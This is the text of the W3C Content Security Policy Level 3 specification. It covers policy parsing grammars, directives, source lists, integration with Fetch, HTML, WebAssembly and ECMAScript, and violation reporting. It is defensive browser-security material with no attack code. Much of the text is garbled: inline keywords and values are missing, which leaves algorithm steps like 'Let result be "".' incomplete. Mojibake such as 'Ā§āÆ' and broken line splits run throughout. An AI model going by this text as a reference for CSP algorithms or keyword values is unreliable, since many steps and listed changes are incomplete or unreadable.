1. Introduction
This section is not normative.
This document defines Content Security Policy (CSP), a tool which developers can use to lock down their applications in various ways, mitigating the risk of content injection vulnerabilities such as cross-site scripting, and reducing the privilege with which their applications execute.
CSP is not intended as a first line of defense against content injection vulnerabilities. Instead, CSP is best used as defense-in-depth. It reduces the harm that a malicious injection can cause, but it is not a replacement for careful input validation and output encoding.
This document is an iteration on Content Security Policy Level 2, with the goal of more clearly explaining the interactions between CSP, HTML, and Fetch on the one hand, and providing clear hooks for modular extensibility on the other. Ideally, this will form a stable core upon which we can build new functionality.
1.1. Examples
1.1.1. Control Execution
Content-Security-Policy: script-src https://cdn.example.com/scripts/; object-src 'none'
1.2. Goals
Content Security Policy aims to do to a few related things:
Mitigate the risk of content-injection attacks by giving developers fairly granular control over
Mitigate the risk of attacks which require a resource to be embedded in a malicious context (the "Pixel Perfect" attack described in [TIMING], for example) by giving developers granular control over the origins which can embed a given resource.
Provide a policy framework which allows developers to reduce the privilege of their applications.
Provide a reporting mechanism which allows developers to detect flaws being exploited in the wild.
1.3. Changes from Level 2
This document describes an evolution of the Content Security Policy Level 2 specification [CSP2]. The following is a high-level overview of the changes:
The specification has been rewritten from the ground up in terms of the [FETCH] specification, which should make it simpler to integrate CSPās requirements and restrictions with other specifications (and with Service Workers in particular).
model has been substantially altered:-
directive, which was deprecated in CSP Level 2, has been undeprecated, but continues to defer tochild-src
if not present (which defers todefault-src
in turn). -
directive has been added, deferring tochild-src
if not present (which likewise defers toscript-src
and eventuallydefault-src
The URL matching algorithm now treats insecure schemes and ports as matching their secure variants. That is, the source expression
will match bothhttp://example.com:80
now matcheshttps:
variants of the pageās origin, even on pages whose scheme ishttp
. -
Violation reports generated from inline script or style will now report "
" as the blocked resource. Likewise, blockedeval()
execution will report "eval
" as the blocked resource. -
directive has been added. -
directive is deprecated in favor of the newreport-to
directive, which relies on [REPORTING] as infrastructure. -
source expression will now allow script which executes on a page to load more script via non-"parser-inserted"script
elements. Details are in Ā§āÆ8.2 Usage of "'strict-dynamic'". -
source expression will now allow event handlers, style attributes andjavascript:
navigation targets to match hashes. Details in Ā§āÆ8.3 Usage of "'unsafe-hashes'". -
The source expression matching has been changed to require explicit presence of any non-HTTP(S) scheme, rather than local scheme, unless that non-HTTP(S) scheme is the same as the scheme of protected resource, as described in Ā§āÆ6.7.2.6 Does url match expression in origin with redirect count?.
Hash-based source expressions may now match external scripts if the
element that triggers the request specifies a set of integrity metadata which is listed in the current policy. Details in Ā§āÆ8.4 Allowing external JavaScript via hashes. -
Reports generated for inline violations will contain a sample attribute if the relevant directive contains the
2. Framework
2.1. Infrastructure
This document uses ABNF grammar to specify syntax, as defined in [RFC5234]. It also relies on
the #rule
ABNF extension defined in Section 5.6.1 of [RFC9110],
with the modification that OWS is replaced with optional-ascii-whitespace. That is, the #rule
used in this
document is defined as:
1#element => element *( optional-ascii-whitespace "," optional-ascii-whitespace element )
and for n >= 1 and m > 1:
<n>#<m>element => element <n-1>*<m-1>( optional-ascii-whitespace "," optional-ascii-whitespace element )
This document depends on the Infra Standard for a number of foundational concepts used in its algorithms and prose [INFRA].
The following definitions are used to improve readability of other definitions in this document.
optional-ascii-whitespace = *( %x09 / %x0A / %x0C / %x0D / %x20 ) required-ascii-whitespace = 1*( %x09 / %x0A / %x0C / %x0D / %x20 ) ; These productions match the definition of ASCII whitespace from the INFRA standard.
2.2. Policies
A policy defines allowed
and restricted behaviors, and may be applied to a Document
, WorkerGlobalScope
, or WorkletGlobalScope
Each policy has an associated directive set, which is an ordered set of directives that define the policyās implications when applied.
Each policy has an associated disposition, which is either
" or "report
Each policy has an associated source, which is either "header
or "meta
Each policy has an associated self-origin, which
is an origin that is used when matching the 'self'
Note: This is needed to facilitate the 'self'
checks of local scheme documents/workers that have inherited their policy but
have an opaque origin. Most of the time this will simply be the environment settings objectās origin.
Multiple policies can be applied to a single resource, and are collected into a list of policies known as a CSP list.
A CSP list contains a header-delivered Content Security Policy if it contains a policy whose source is "header
A serialized CSP is an ASCII string consisting of a semicolon-delimited series of serialized directives, adhering to the following ABNF grammar [RFC5234]:
serialized-policy = serialized-directive *( optional-ascii-whitespace ";" [ optional-ascii-whitespace serialized-directive ] )
A serialized CSP list is an ASCII string consisting of a comma-delimited series of serialized CSPs, adhering to the following ABNF grammar [RFC5234]:
serialized-policy-list = 1#serialized-policy ; The '#' rule is the one defined in section 5.6.1 of RFC 9110 ; but it incorporates the modifications specified ; in section 2.1 of this document.
2.2.1. Parse a serialized CSP
To parse a serialized CSP, given a string (serialized), a source (source), and a disposition (disposition), execute the following steps.
This algorithm returns a Content Security Policy object. If serialized could not be parsed, the objectās directive set will be empty.
Let policy be a new policy with an empty directive set, a source of source, and a disposition of disposition.
For each token returned by strictly splitting serialized on the U+003B SEMICOLON character (
Strip leading and trailing ASCII whitespace from token.
If token is an empty string, or if token is not an ASCII string, continue.
Let directive name be the result of collecting a sequence of code points from token which are not ASCII whitespace.
Set directive name to be the result of running ASCII lowercase on directive name.
Note: Directive names are case-insensitive, that is:
script-SRC 'none'
andScRiPt-sRc 'none'
are equivalent. -
If policyās directive set contains a directive whose name is directive name, continue.
Note: In this case, the user agent SHOULD notify developers that a duplicate directive was ignored. A console warning might be appropriate, for example.
Let directive value be the result of splitting token on ASCII whitespace.
Let directive be a new directive whose name is directive name, and value is directive value.
Append directive to policyās directive set.
Return policy.
2.2.2. Parse a serialized CSP list
To parse a serialized CSP list, given a byte sequence or string (list), a source (source), and a disposition (disposition), execute the following steps.
This algorithm returns a list of Content Security Policy objects. If list cannot be parsed, the returned list will be empty.
If list is a byte sequence, then set list to be the result of isomorphic decoding list.
Let policies be an empty list.
For each token returned by splitting list on commas:
Let policy be the result of parsing token, with a source of source, and disposition of disposition.
If policyās directive set is empty, continue.
Append policy to policies.
Return policies.
2.2.3. Parse responseās Content Security Policies
To parse a responseās Content Security Policies given a response (response):
Let policies be the result of parsing the result of extracting header list values given
and responseās header list, with a source of "header
", and a disposition of "enforce
". -
Append to policies the result of parsing the result of extracting header list values given
and responseās header list, with a source of "header
", and a disposition of "report
". -
For each policy of policies:
Set policyās self-origin to responseās url's origin.
Return policies.
Note: When parsing a responseās Content Security Policies, if the resulting policies end up containing at least one item, user agents can hold a flag on policies and use it to optimize away the contains a header-delivered Content Security Policy algorithm.
2.3. Directives
Each policy contains an ordered set of directives (its directive set), each of which controls a specific behavior. The directives defined in this document are described in detail in Ā§āÆ6 Content Security Policy Directives.
Each directive is a name / value pair. The name is a non-empty string, and the value is a set of non-empty strings. The value MAY be empty.
A serialized directive is an ASCII string, consisting of one or more whitespace-delimited tokens, and adhering to the following ABNF [RFC5234]:
serialized-directive = directive-name [ required-ascii-whitespace directive-value ] directive-name = 1*( ALPHA / DIGIT / "-" ) directive-value = *( required-ascii-whitespace / ( %x21-%x2B / %x2D-%x3A / %x3C-%x7E ) ) ; Directive values may contain whitespace and VCHAR characters, ; excluding ";" and ",". The second half of the definition ; above represents all VCHAR characters (%x21-%x7E) ; without ";" and "," (%x3B and %x2C respectively) ; ALPHA, DIGIT, and VCHAR are defined in Appendix B.1 of RFC 5234.
Directives have a number of associated algorithms:
A pre-request check, which takes a request and a policy as an argument, and is executed during Ā§āÆ4.1.2 Should request be blocked by Content Security Policy?. This algorithm returns "
" unless otherwise specified. -
A post-request check, which takes a request, a response, and a policy as arguments, and is executed during Ā§āÆ4.1.3 Should response to request be blocked by Content Security Policy?. This algorithm returns "
" unless otherwise specified. -
An inline check, which takes an
, a type string, a policy, and a source string as arguments, and is executed during Ā§āÆ4.2.3 Should elementās inline type behavior be blocked by Content Security Policy? and during Ā§āÆ4.2.4 Should navigation request of type be blocked by Content Security Policy? forjavascript:
requests. This algorithm returns "Allowed
" unless otherwise specified. -
An initialization, which takes a
or global object and a policy as arguments. This algorithm is executed during Ā§āÆ4.2.1 Run CSP initialization for a Document and Ā§āÆ4.2.6 Run CSP initialization for a global object.. Unless otherwise specified, it has no effect and it returns "Allowed
". -
A pre-navigation check, which takes a request, a navigation type string ("
" or "other
"), and a policy as arguments, and is executed during Ā§āÆ4.2.4 Should navigation request of type be blocked by Content Security Policy?. It returns "Allowed
" unless otherwise specified. -
A navigation response check, which takes a request, a navigation type string ("
" or "other
"), a response, a navigable, a check type string ("source
" or "response
"), and a policy as arguments, and is executed during Ā§āÆ4.2.5 Should navigation response to navigation request of type in target be blocked by Content Security Policy?. It returns "Allowed
" unless otherwise specified. -
A webrtc pre-connect check, which takes a policy, and is executed during Ā§āÆ4.3.1 Should RTC connections be blocked for global?. It returns "
" unless otherwise specified.
2.3.1. Source Lists
Many directives' values consist of source lists: sets of strings which identify content that can be fetched and potentially embedded or executed. Each string represents one of the following types of source expression:
Keywords such as
(which match nothing and the current URLās origin, respectively) -
Serialized URLs such as
(which matches a specific file) orhttps://example.com/
(which matches everything on that origin) -
Schemes such as
(which matches any resource having the specified scheme) -
Hosts such as
(which matches any resource on the host, regardless of scheme) or*.example.com
(which matches any resource on the hostās subdomains (and any of its subdomains' subdomains, and so on)) -
Nonces such as
(which can match specific elements on a page) -
Digests such as
(which can match specific elements on a page)
A serialized source list is an ASCII string, consisting of a whitespace-delimited series of source expressions, adhering to the following ABNF grammar [RFC5234]:
serialized-source-list = ( source-expression *( required-ascii-whitespace source-expression ) ) / "'none'"
source-expression = scheme-source / host-source / keyword-source
/ nonce-source / hash-source
; Schemes: "https:" / "custom-scheme:" / "another.custom-scheme:"
scheme-source = scheme-part ":"
; Hosts: "example.com" / "*.example.com" / "https://*.example.com:12/path/to/file.js"
host-source = [ scheme-part "://" ] host-part [ ":" port-part ] [ path-part ]
scheme-part = scheme
; scheme is defined in section 3.1 of RFC 3986.
host-part = "*" / [ "*." ] 1*host-char *( "." 1*host-char )
host-char = ALPHA / DIGIT / "-"
port-part = 1*DIGIT / "*"
path-part = path-absolute (but not including ";" or ",")
; path-absolute is defined in section 3.3 of RFC 3986.
; Keywords:
keyword-source = "'self'" / "'unsafe-inline'" / "'unsafe-eval'"
/ "'strict-dynamic'" / "'unsafe-hashes'" /
/ "'report-sample'" / "'unsafe-allow-redirects'"
/ "'wasm-unsafe-eval'"
ISSUE: Bikeshed unsafe-allow-redirects
; Nonces: 'nonce-[nonce goes here]'
nonce-source = "'nonce-" base64-value "'"
base64-value = 1*( ALPHA / DIGIT / "+" / "/" / "-" / "_" )*2( "=" )
; Digests: 'sha256-[digest goes here]'
hash-source = "'" hash-algorithm "-" base64-value "'"
hash-algorithm = "sha256" / "sha384" / "sha512"
The host-char production intentionally contains only ASCII
characters; internationalized domain names cannot be entered directly as part
of a serialized CSP, but instead MUST be Punycode-encoded [RFC3492]. For example, the domain Ć¼Ć¼Ć¼Ć¼Ć¼Ć¼.de
MUST be represented as xn--tdaaaaaa.de
Note: Though IP address do match the grammar above, only
will actually match a URL when used in a source
expression (see Ā§āÆ6.7.2.5 Does url match source list in origin with redirect count? for details). The security
properties of IP addresses are suspect, and authors ought to prefer hostnames
whenever possible.
Note: The base64-value grammar allows both base64 and base64url encoding. These encodings are treated as equivalant when processing hash-source values. Nonces, however, are strict string matches: we use the base64-value grammar to limit the characters available, and reduce the complexity for the server-side operator (encodings, etc), but the user agent doesnāt actually care about any underlying value, nor does it do any decoding of the nonce-source value.
2.4. Violations
A violation represents an action or resource which goes against the set of policy objects associated with a global object.
Each violation has a global object, which is the global object whose policy has been violated.
Each violation has a url which is its global objectās URL
Each violation has a status which is a non-negative integer representing the HTTP status code of the resource for which the global object was instantiated.
Each violation has a resource, which is
either null
, "inline
", "eval
", "wasm-eval
", or a URL
. It represents the resource
which violated the policy.
Note: The value null
for a violationās resource is only allowed while the violation is
being populated. By the time the violation is reported and its resource is used for obtaining the blocked URI, the violationās resource should be populated with a URL
or one of the allowed strings.
Each violation has a referrer, which is either null
, or a URL
. It represents the referrer of the resource whose policy
was violated.
Each violation has a policy, which is the policy that has been violated.
Each violation has a disposition, which is the disposition of the policy that has been violated.
Each violation has an effective directive which is a non-empty string representing the directive whose enforcement caused the violation.
Each violation has a source file, which is
either null
or a URL
Each violation has a line number, which is a non-negative integer.
Each violation has a column number, which is a non-negative integer.
Each violation has a element, which is either null
or an element.
Each violation has a sample, which is a string. It is the empty string unless otherwise specified.
Note: A violationās sample will be populated with the first 40 characters of an inline script, event handler, or style that caused an violation. Violations which stem from an external file will not include a sample in the violation report.
2.4.1. Create a violation object for global, policy, and directive
Given a global object (global), a policy (policy), and a string (directive), the following algorithm creates a new violation object, and populates it with an initial set of data:
Let violation be a new violation whose global object is global, policy is policy, effective directive is directive, and resource is
. -
If the user agent is currently executing script, and can extract a source fileās URL, line number, and column number from the global, set violationās source file, line number, and column number accordingly.
Is this kind of thing specified anywhere? I didnāt see anything that looked useful in [ECMA262].
Note: User agents need to ensure that the source file is the URL requested by the page, pre-redirects. If thatās not possible, user agents need to strip the URL down to an origin to avoid unintentional leakage.
If global is a
object, set violationās referrer to globalāsdocument
. -
Set violationās status to the HTTP status code for the resource associated with violationās global object.
How, exactly, do we get the status code? We donāt actually store it anywhere.
Return violation.
2.4.2. Create a violation object for request, and policy.
Given a request (request), a policy (policy), the following algorithm creates a new violation object, and populates it with an initial set of data:
Let directive be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
Let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on requestās clientās global object, policy, and directive.
Set violationās resource to requestās url.
Note: We use requestās url, and not its current url, as the latter might contain information about redirect targets to which the page MUST NOT be given access.
Return violation.
3. Policy Delivery
A server MAY declare a policy for a particular resource representation via an HTTP response header field whose value is a serialized CSP. This mechanism is defined in detail in Ā§āÆ3.1 The Content-Security-Policy HTTP Response Header Field and Ā§āÆ3.2 The Content-Security-Policy-Report-Only HTTP Response Header Field, and the integration with Fetch and HTML is described in Ā§āÆ4.1 Integration with Fetch and Ā§āÆ4.2 Integration with HTML.
A policy may also be declared inline in an HTML document via a meta
elementās http-equiv
attribute, as described in Ā§āÆ3.3 The <meta> element.
3.1. The Content-Security-Policy
HTTP Response Header Field
The Content-Security-Policy
HTTP response header field is the preferred mechanism for delivering a policy from a server to a
client. The headerās value is represented by the following ABNF [RFC5234]:
Content-Security-Policy = 1#serialized-policy ; The '#' rule is the one defined in section 5.6.1 of RFC 9110 ; but it incorporates the modifications specified ; in section 2.1 of this document.
Content-Security-Policy: script-src 'self'; report-to csp-reporting-endpoint
A server MAY send different Content-Security-Policy
header field
values with different representations of the same resource.
A server SHOULD NOT send more than one HTTP response header field named
" with a given resource
When the user agent receives a Content-Security-Policy
header field, it
MUST parse and enforce each serialized CSP it contains as described in Ā§āÆ4.1 Integration with Fetch, Ā§āÆ4.2 Integration with HTML.
3.2. The Content-Security-Policy-Report-Only
HTTP Response Header Field
The Content-Security-Policy-Report-Only
HTTP response header field allows web developers to experiment with policies by monitoring (but
not enforcing) their effects. The headerās value is represented by the following ABNF [RFC5234]:
Content-Security-Policy-Report-Only = 1#serialized-policy ; The '#' rule is the one defined in section 5.6.1 of RFC 9110 ; but it incorporates the modifications specified ; in section 2.1 of this document.
This header field allows developers to piece together their security policy in an iterative fashion, deploying a report-only policy based on their best estimate of how their site behaves, watching for violation reports, and then moving to an enforced policy once theyāve gained confidence in that behavior.
Content-Security-Policy-Report-Only: script-src 'self'; report-to csp-reporting-endpoint
A server MAY send different Content-Security-Policy-Report-Only
header field values with different representations of the same
A server SHOULD NOT send more than one HTTP response header field named
" with a given resource
When the user agent receives a Content-Security-Policy-Report-Only
field, it MUST parse and monitor each serialized CSP it contains as described in Ā§āÆ4.1 Integration with Fetch and Ā§āÆ4.2 Integration with HTML.
Note: The Content-Security-Policy-Report-Only
header is not supported inside a meta
3.3. The <meta>
A Document
may deliver a policy via one or more HTML meta
whose http-equiv
attributes are an ASCII case-insensitive match for the string "Content-Security-Policy
". For example:
Implementation details can be found in HTMLās Content Security Policy
state http-equiv
processing instructions [HTML].
Note: The Content-Security-Policy-Report-Only
header is not supported inside a meta
element. Neither are the report-uri
, frame-ancestors
, and sandbox
Authors are strongly encouraged to place meta
elements as early
in the document as possible, because policies in meta
elements are not
applied to content which precedes them. In particular, note that resources
fetched or prefetched using the Link
HTTP response header
field, and resources fetched or prefetched using link
and script
elements which precede a meta
-delivered policy will not be blocked.
Note: A policy specified via a meta
element will be enforced along with
any other policies active for the protected resource, regardless
of where theyāre specified. The general impact of enforcing multiple
policies is described in Ā§āÆ8.1 The effect of multiple policies.
Note: Modifications to the content
attribute of a meta
after the element has been parsed will be ignored.
4. Integrations
This section is non-normative.
This document defines a set of algorithms which are used in other specifications in order to implement the functionality. These integrations are outlined here for clarity, but those external documents are the normative references which ought to be consulted for detailed information.
4.1. Integration with Fetch
A number of directives control resource loading in one way or another. This specification provides algorithms which allow Fetch to make decisions about whether or not a particular request should be blocked or allowed, and about whether a particular response should be replaced with a network error.
Ā§āÆ4.1.2 Should request be blocked by Content Security Policy? is called as part of step 2.4 of the Main Fetch algorithm. This allows directives' pre-request checks to be executed against each request before it hits the network, and against each redirect that a request might go through on its way to reaching a resource.
Ā§āÆ4.1.3 Should response to request be blocked by Content Security Policy? is called as part of step 11 of the Main Fetch algorithm. This allows directives' post-request checks to be executed on the response delivered from the network or from a Service Worker.
4.1.1. Report Content Security Policy violations for request
Given a request (request), this algorithm reports violations based on policy container's CSP list "report only" policies.
Let CSP list be requestās policy container's CSP list.
For each policy of CSP list:
If policyās disposition is "
", then skip to the next policy. -
Let violates be the result of executing Ā§āÆ6.7.2.1 Does request violate policy? on request and policy.
If violates is not "
Does Not Violate
", then execute Ā§āÆ5.5 Report a violation on the result of executing Ā§āÆ2.4.2 Create a violation object for request, and policy. on request, and policy.
4.1.2. Should request be blocked by Content Security Policy?
Given a request (request), this algorithm returns Blocked
or Allowed
reports violations based on requestās policy container's CSP list.
Let CSP list be requestās policy container's CSP list.
Let result be "
". -
For each policy of CSP list:
If policyās disposition is "
", then skip to the next policy. -
Let violates be the result of executing Ā§āÆ6.7.2.1 Does request violate policy? on request and policy.
If violates is not "
Does Not Violate
", then:-
Execute Ā§āÆ5.5 Report a violation on the result of executing Ā§āÆ2.4.2 Create a violation object for request, and policy. on request, and policy.
Set result to "
Return result.
4.1.3. Should response to request be blocked by Content Security Policy?
Given a response (response) and a request (request), this algorithm
returns Blocked
or Allowed
, and reports violations based on requestās policy container's CSP list.
Let CSP list be requestās policy container's CSP list.
Let result be "
". -
For each policy of CSP list:
For each directive of policy:
If the result of executing directiveās post-request check is "
", then:-
Execute Ā§āÆ5.5 Report a violation on the result of executing Ā§āÆ2.4.2 Create a violation object for request, and policy. on request, and policy.
If policyās disposition is "
", then set result to "Blocked
Note: This portion of the check verifies that the page can load the response. That is, that a Service Worker hasnāt substituted a file which would violate the pageās CSP.
Return result.
4.2. Integration with HTML
The policy container has a CSP list, which holds all the policy objects which are active for a given context. This list is empty unless otherwise specified, and is populated from the response by parsing responseās Content Security Policies or inherited following the rules of the policy container.
A global objectās CSP list is the result of executing Ā§āÆ4.2.2 Retrieve the CSP list of an object with the global object as the
. -
A policy is enforced or monitored for a global object by inserting it into the global objectās CSP list.
Ā§āÆ4.2.1 Run CSP initialization for a Document is called during the create and initialize a new
object algorithm. -
Ā§āÆ4.2.3 Should elementās inline type behavior be blocked by Content Security Policy? is called during the prepare the script element and update a
block algorithms in order to determine whether or not an inline script or style block is allowed to execute/render. -
Ā§āÆ4.2.3 Should elementās inline type behavior be blocked by Content Security Policy? is called during handling of inline event handlers (like
) and inlinestyle
attributes in order to determine whether or not they ought to be allowed to execute/render. -
policy is enforced during processing of the
. -
HTML populates each requestās cryptographic nonce metadata and parser metadata with relevant data from the elements responsible for resource loading.
Stylesheet loading is not yet integrated with Fetch in WHATWGās HTML. [Issue #whatwg/html#968]
Ā§āÆ6.3.1.1 Is base allowed for document? is called during
's set the frozen base URL algorithm to ensure that thehref
attributeās value is valid. -
Ā§āÆ4.2.4 Should navigation request of type be blocked by Content Security Policy? is called during the create navigation params by fetching algorithm, and Ā§āÆ4.2.5 Should navigation response to navigation request of type in target be blocked by Content Security Policy? is called during the attempt to populate the history entryās document algorithm to apply directiveās navigation checks, as well as inline checks for navigations to
URLs. -
Ā§āÆ4.2.6 Run CSP initialization for a global object. is called during the run a worker algorithm.
The sandbox directive is used to populate the CSP-derived sandboxing flags.
4.2.1. Run CSP
initialization for a Document
Given a Document
(document), the user agent performs the following
steps in order to initialize CSP for document:
For each policy of documentās policy container's CSP list:
For each directive of policy:
Execute directiveās initialization algorithm on document, and assert: its returned value is "
4.2.2. Retrieve the CSP list of an object
To obtain objectās CSP list:
If object is a
return objectās policy container's CSP list. -
If object is a
or aWorkerGlobalScope
or aWorkletGlobalScope
, return environment settings objectās policy container's CSP list. -
4.2.3. Should elementās inline type behavior be blocked by Content Security Policy?
Given an Element
(element), a string (type), and a string (source)
this algorithm returns "Allowed
" if the element is allowed to have inline
definition of a particular type of behavior (script execution, style
application, event handlers, etc.), and "Blocked
" otherwise:
Note: The valid values for type are "script
", "script attribute
", and "style attribute
Assert: element is not
. -
Let result be "
". -
For each policy of elementās
's global objectās CSP list:-
For each directive of policyās directive set:
If directiveās inline check returns "
" when executed upon element, type, policy and source, skip to the next directive. -
Let directive-name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
Otherwise, let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on the current settings objectās global object, policy, and directive-name.
Set violationās resource to "
". -
Set violationās element to element.
If directiveās value contains the expression "
", then set violationās sample to the substring of source containing its first 40 characters. -
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", then set result to "Blocked
Return result.
4.2.4. Should navigation request of type be blocked by Content Security Policy?
Given a request (navigation request) and a string (type, either
" or "other
"), this algorithm return "Blocked
" if the active policy blocks
the navigation, and "Allowed
" otherwise:
Let result be "
". -
For each policy of navigation requestās policy containerās CSP list:
For each directive of policy:
If directiveās pre-navigation check returns "
" when executed upon navigation request, type, and policy skip to the next directive. -
Otherwise, let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on navigation requestās clientās global object, policy, and directiveās name.
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", then set result to "Blocked
If result is "
", and if navigation requestās current URLās scheme isjavascript
For each policy of navigation requestās clientās global objectās CSP list:
For each directive of policy:
Let directive-name be the result of executing Ā§āÆ6.8.2 Get the effective directive for inline checks on type.
If directiveās inline check returns "
" when executed uponnull
, "navigation
" and navigation requestās current URL, skip to the next directive. -
Otherwise, let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on navigation requestās clientās global object, policy, and directive-name.
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", then set result to "Blocked
Return result.
4.2.5. Should navigation response to navigation request of type in target be blocked by Content Security Policy?
Given a request (navigation request), a response navigation
response, a CSP list response CSP list, a string (type, either
" or "other
"), and a navigable target, this algorithm
returns "Blocked
" if the active policy blocks the navigation, and "Allowed
Let result be "
". -
For each policy of response CSP list:
Note: Some directives (like frame-ancestors) allow a responseās Content Security Policy to act on the navigation.
For each directive of policy:
If directiveās navigation response check returns "
" when executed upon navigation request, type, navigation response, target, "response
", and policy skip to the next directive. -
Otherwise, let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on
, policy, and directiveās name.Note: We use
for the global object, as no global exists: we havenāt processed the navigation to create a Document yet. -
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", then set result to "Blocked
For each policy of navigation requestās policy containerās CSP list:
Note: Some directives in the navigation requestās context (like frame-ancestors) need the response before acting on the navigation.
For each directive of policy:
If directiveās navigation response check returns "
" when executed upon navigation request, type, navigation response, target, "source
", and policy skip to the next directive. -
Otherwise, let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on navigation requestās clientās global object, policy, and directiveās name.
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", then set result to "Blocked
Return result.
4.2.6. Run CSP
initialization for a global object.
Given a global object (global), the user agent performs the
following steps in order to initialize CSP for global. This algorithm
returns "Allowed
" if global is allowed, and "Blocked
" otherwise:
Let result be "
". -
For each policy of globalās CSP list:
For each directive of policy:
Execute directiveās initialization algorithm on global. If its returned value is "
", then set result to "Blocked
Return result.
4.3. Integration with WebRTC
The administratively-prohibited algorithm calls Ā§āÆ4.3.1 Should RTC connections be blocked for global? when invoked, and prohibits all candidates if it returns "Blocked
4.3.1. Should RTC connections be blocked for global?
Given a global object (global), this algorithm returns "Blocked
if the active policy for global blocks RTC connections, and "Allowed
" otherwise:
Let result be "
". -
For each policy of globalās CSP list:
For each directive of policy:
If directiveās webrtc pre-connect check returns "
", continue. -
Otherwise, let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on global, policy, and directiveās name.
Set violationās resource to
. -
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", then set result to "Blocked
Return result.
4.4. Integration with ECMAScript
ECMAScript defines a HostEnsureCanCompileStrings()
abstract operation
which allows the host environment to block the compilation of strings into
ECMAScript code. This document defines an implementation of that abstract
operation which examines the relevant CSP list to determine whether such compilation ought to be blocked.
4.4.1. EnsureCSPDoesNotBlockStringCompilation(realm, source)
Given a realm (realm) and a string (source), this algorithm
returns normally if string compilation is allowed, and throws an "EvalError
if not:
Let result be "
". -
Let global be realmās global object.
For each policy of globalās CSP list:
Let source-list be
. -
If policy contains a directive whose name is "
", then set source-list to that directive's value.Otherwise if policy contains a directive whose name is "
", then set source-list to that directiveās value. -
If source-list is not
, and does not contain a source expression which is an ASCII case-insensitive match for the string "'unsafe-eval'
", then:-
Let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on global, policy, and "
". -
Set violationās resource to "
". -
If source-list contains the expression "
", then set violationās sample to the substring of source containing its first 40 characters. -
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", then set result to "Blocked
If result is "
", throw anEvalError
does not include the string which is
going to be compiled as a parameter. Weāll also need to update HTML to pipe that value through
to CSP. [Issue #tc39/ecma262#938]
4.5. Integration with WebAssembly
WebAssembly defines the HostEnsureCanCompileWasmBytes()
abstract operation
which allows the host environment to block the compilation of WebAssembly
sources into executable code. This document defines an implementation of this
abstract operation which examines the relevant CSP
list to determine whether such compilation ought to be blocked.
4.5.1. EnsureCSPDoesNotBlockWasmByteCompilation(realm)
Given a realm (realm),
this algorithm returns normally if compilation is allowed, and throws a WebAssembly.CompileError
if not:
Let global be realmās global object.
Let result be "
". -
For each policy of globalās CSP list:
Let source-list be
. -
If policy contains a directive whose name is "
", then set source-list to that directive's value.Otherwise if policy contains a directive whose name is "
", then set source-list to that directiveās value. -
If source-list is non-
, and does not contain a source expression which is an ASCII case-insensitive match for the string "'unsafe-eval'
", and does not contain a source expression which is an ASCII case-insensitive match for the string "'wasm-unsafe-eval'
", then:-
Let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on global, policy, and "
". -
Set violationās resource to "
". -
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", then set result to "Blocked
If result is "
", throw aWebAssembly.CompileError
5. Reporting
When one or more of a policyās directives is violated, a csp violation report may be generated and sent out to a reporting endpoint associated with the policy.
csp violation reports have the report type "csp-violation".
csp violation reports are visible to ReportingObserver
[Exposed =Window ]interface :
CSPViolationReportBody ReportBody { [Default ]object ();
toJSON readonly attribute USVString ;
documentURL readonly attribute USVString ?;
referrer readonly attribute USVString ?;
blockedURL readonly attribute DOMString ;
effectiveDirective readonly attribute DOMString ;
originalPolicy readonly attribute USVString ?;
sourceFile readonly attribute DOMString ?;
sample readonly attribute SecurityPolicyViolationEventDisposition ;
disposition readonly attribute unsigned short ;
statusCode readonly attribute unsigned long ?;
lineNumber readonly attribute unsigned long ?; };
5.1. Violation DOM Events
enum {
SecurityPolicyViolationEventDisposition ,
"enforce" }; [
"report" Exposed =(Window ,Worker )]interface :
SecurityPolicyViolationEvent Event {(
constructor DOMString ,
type optional SecurityPolicyViolationEventInit = {});
eventInitDict readonly attribute USVString ;
documentURI readonly attribute USVString ;
referrer readonly attribute USVString ;
blockedURI readonly attribute DOMString ;
effectiveDirective readonly attribute DOMString ; // historical alias of effectiveDirective
violatedDirective readonly attribute DOMString ;
originalPolicy readonly attribute USVString ;
sourceFile readonly attribute DOMString ;
sample readonly attribute SecurityPolicyViolationEventDisposition ;
disposition readonly attribute unsigned short ;
statusCode readonly attribute unsigned long ;
lineNumber readonly attribute unsigned long ; };
columnNumber dictionary :
SecurityPolicyViolationEventInit EventInit {required USVString ;
documentURI USVString = "";
referrer USVString = "";
blockedURI required DOMString ;
violatedDirective required DOMString ;
effectiveDirective required DOMString ;
originalPolicy USVString = "";
sourceFile DOMString = "";
sample required SecurityPolicyViolationEventDisposition ;
disposition required unsigned short ;
statusCode unsigned long = 0;
lineNumber unsigned long = 0; };
5.2. Obtain the blockedURI
of a violationās resource
Given a violationās resource (resource), this algorithm returns a string, to be used as the blocked URI field for violation reports.
If resource is a URL, return the result of executing Ā§āÆ5.4 Strip URL for use in reports on resource.
Return resource.
5.3. Obtain the deprecated serialization of violation
Given a violation (violation), this algorithm returns a JSON text
string representation of the violation, suitable for submission to a reporting
endpoint associated with the deprecated report-uri
Let body be a map with its keys initialized as follows:
- "
" -
The result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās url.
- "
" -
The result of executing Ā§āÆ5.4 Strip URL for use in reports on violationās referrer.
- "
" -
The result of executing Ā§āÆ5.2 Obtain the blockedURI of a violationās resource on violationās resource.
- "
" -
violationās effective directive
- "
" -
violationās effective directive
- "
" -
The serialization of violationās policy
- "
" -
The disposition of violationās policy
- "
" -
